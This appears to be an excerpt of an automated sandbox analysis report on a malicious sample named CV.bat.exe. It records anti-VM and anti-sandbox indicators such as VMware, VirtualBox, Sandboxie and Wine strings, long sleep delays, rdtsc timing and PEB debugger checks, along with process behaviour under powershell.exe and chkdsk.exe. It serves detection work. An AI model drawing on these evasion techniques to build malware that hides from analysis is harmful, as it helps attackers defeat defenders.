Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CV.bat.exe PID: 6056, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\CV.bat.exe TID: 6044	Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\Desktop\CV.bat.exe TID: 6036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep time: -5534023222112862s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01286DE6 rdtsc

Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9452

Source: C:\Users\user\Desktop\CV.bat.exe

API coverage: 8.8 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 41226
Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\6HARDWARE\Description\System"SystemBiosVersionTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: CV.bat.exe, 00000000.00000002.299464091.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.396822485.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.360030003.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01286DE6 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\CV.bat.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012CA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01283D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01267D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012735A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012D41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012F8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01302073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01260050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012890AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012458EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013014FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]
